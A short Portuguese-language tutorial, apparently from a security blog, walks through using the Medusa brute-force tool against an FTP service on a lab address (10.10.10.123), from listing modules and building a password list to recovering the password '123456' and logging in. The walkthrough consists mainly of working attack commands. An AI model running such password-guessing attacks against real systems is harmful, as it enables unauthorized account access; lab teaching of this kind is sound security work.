Medusa é uma ferramenta de brute force para a realização de ataques remotos, possui diversos módulos para realizar ataques. | ||
Site: foofus.net | ||
01 — Passo | ||
Listar módulos disponíveis para ataque, neste exemplo iremos utilizar o módulo FTP. | ||
medusa : Ferramenta. | ||
medusa -q | more | ||
02 — Passo | ||
Crie o arquivo senhas.txt contendo possíveis senhas. | ||
cat senhas.txt | ||
03 — Passo | ||
Realizando o ataque, como segue abaixo a senha do usuário 100security foi revelada : 123456. | ||
-h : Define o host alvo. | ||
medusa -h 10.10.10.123 -u 100security -P senhas.txt -M ftp | ||
04 — Passo | ||
Acesso ao ftp com o usuário 100security e senha 123456. | ||
ftp 10.10.10.123 | ||